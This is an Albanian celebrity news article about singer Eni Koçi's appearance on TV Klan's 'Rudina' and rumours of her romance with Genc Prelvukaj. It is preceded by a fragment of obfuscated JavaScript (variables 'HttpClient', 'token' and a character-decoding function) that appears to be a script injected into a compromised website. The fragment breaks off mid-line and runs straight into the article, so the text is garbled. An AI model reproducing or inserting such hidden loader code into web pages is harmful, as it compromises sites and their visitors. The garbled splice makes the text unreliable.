;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Eni Koçi tregon se a është e dashuruar

By

Këngëtarja Eni Koçi, si e ftuar në emisionin ‘Rudina’ në TV Klan sot promovoi projektin e ri ‘Hold UP’ dhe jo vetëm.

Në një pjesë të intervistës, Eni u pyet edhe për dashurinë, ndonëse sipas të gjitha gjasave me një kompromis për të mos u thelluar në detaje.

Duke i rënë nga Kina, Koçi pranoi se është e dashuruar me gjëra që i falin dashuri, nga familja e deri tek puna dhe karriera.

Në asnjë moment, as nga ana e prezantueses e as nga ajo e këngëtares nuk u përmend Genc Prelvukaj por rrotull, këngëtarja tha se nuk i pengojnë shkrimet e portaleve sipas qejfit të tyre.

Ajo nuk zgjodhi raportimin mbi lidhjen si shembull, por një dezinformatë në lidhje me mungesën e nënës për të dëshmuar se mediat shpesh edhe gabojnë por këtë e merr shtruar.

Ndryshe, Prive të shtunën, si çdo herë tjetër, nga burime të sigurta konfirmoi lajmin se Eni dhe Genc Prelvukaj kanë tashmë katër – pesë muaj që kanë nisur një romancë e cila po iu ec shumë mirë. /Prive.al/

Artikuj të ngjashëm